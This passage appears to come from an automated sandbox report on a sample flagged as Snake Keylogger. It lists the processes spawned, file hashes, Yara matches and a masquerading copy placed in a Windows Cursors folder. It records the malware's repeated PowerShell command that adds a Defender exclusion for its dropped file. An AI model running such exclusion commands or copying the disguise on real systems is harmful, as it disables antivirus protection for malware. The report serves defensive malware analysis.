                                                        Start time:11:02:15
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:11:02:16
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:11:02:17
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:11:02:19
                                                        Start date:08/04/2021
                                                        Path:C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Imagebase:0x7d0000
                                                        File size:46080 bytes
                                                        MD5 hash:0802967C1D72DEEB4E1B79AF74FDB553
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                        General

                                                        Start time:11:02:19
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:11:02:20
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe'
                                                        Imagebase:0x640000
                                                        File size:46080 bytes
                                                        MD5 hash:0802967C1D72DEEB4E1B79AF74FDB553
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, Author: Joe Security

                                                        General

                                                        Start time:11:02:20
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:11:02:21
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:11:02:22
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:11:02:24
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 2300
                                                        Imagebase:0xa40000
                                                        File size:434592 bytes
                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        General

                                                        Start time:11:02:29
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:11:02:47
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                                                        Imagebase:0xb0000
                                                        File size:430592 bytes
                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        General

                                                        Start time:11:02:47
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:11:02:48
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                                                        Imagebase:0xb0000
                                                        File size:430592 bytes
                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        General

                                                        Start time:11:02:48
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:11:02:49
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                                                        Imagebase:0xb0000
                                                        File size:430592 bytes
                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        General

                                                        Start time:11:02:50
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:11:02:50
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Disassembly

                                                        Code Analysis
